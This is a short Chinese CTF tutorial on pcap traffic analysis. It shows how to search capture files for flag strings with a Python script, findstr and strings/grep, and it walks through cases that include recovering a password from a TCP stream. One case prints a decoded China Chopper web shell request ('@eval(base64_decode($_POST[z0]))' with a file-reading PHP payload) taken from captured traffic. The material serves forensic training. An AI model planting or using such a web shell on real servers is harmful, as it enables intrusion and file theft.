CTF之流量分析

您所在的位置:网站首页 ctf icmp信息隐藏 CTF之流量分析

CTF之流量分析

#CTF之流量分析| 来源: 网络整理| 查看: 265

CTF杂项中存在一种题型——流量分析,主要是给你一个流量包,让你分析获取其中的flag的值。

有5种方式,可以直接查找flag。

1、直接搜索

2、使用notepad++等软件,直接打开流量包,搜索关键字

3、编写python脚本

#encoding:utf-8 #用二进制方式读取文件 file=open("networking.pcap","rb") #读取文件内容 i=file.read() #查找字段 a1=i.find("flag{") a2=i.find("}",a1) #将查找的字段,组合起来 a3=i[a1:a2+1] print a3

4、windows cmd命令

type networking.pcap | findstr "flag"

5、linux string 命令

strings networking.pcap | grep flag

实战

案例一:

案例二:

使用wireshare打开pcap包,显示tcp流

好像已经找到了密码,但是有点不对劲,hex dump一下看看。

7f对应的ascII码是DEL,是删除,0D代表的是回车。

因此flag是backdoor00Rm8ate

案例三:简单文件提取

wireshark读取pcap包,追踪TCP流,

将post请求,进行url及base64解码,发现好像是菜刀客户端流量,使用菜刀客户端下载了x.tar.gz文件。

ISG2014= @eval(base64_decode($_POST[z0])); &z0=@ini_set("display_errors","0"); @set_time_limit(0); @set_magic_quotes_runtime(0); echo("->|"); ;$F=get_magic_quotes_gpc()?stripslashes($_POST["z1"]):$_POST["z1"]; $fp=@fopen($F,"r"); if(@fgetc($fp)){@fclose($fp);@readfile($F); } else { echo("ERROR:// Can Not Read"); }; echo("|


【本文地址】


今日新闻


推荐新闻


CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3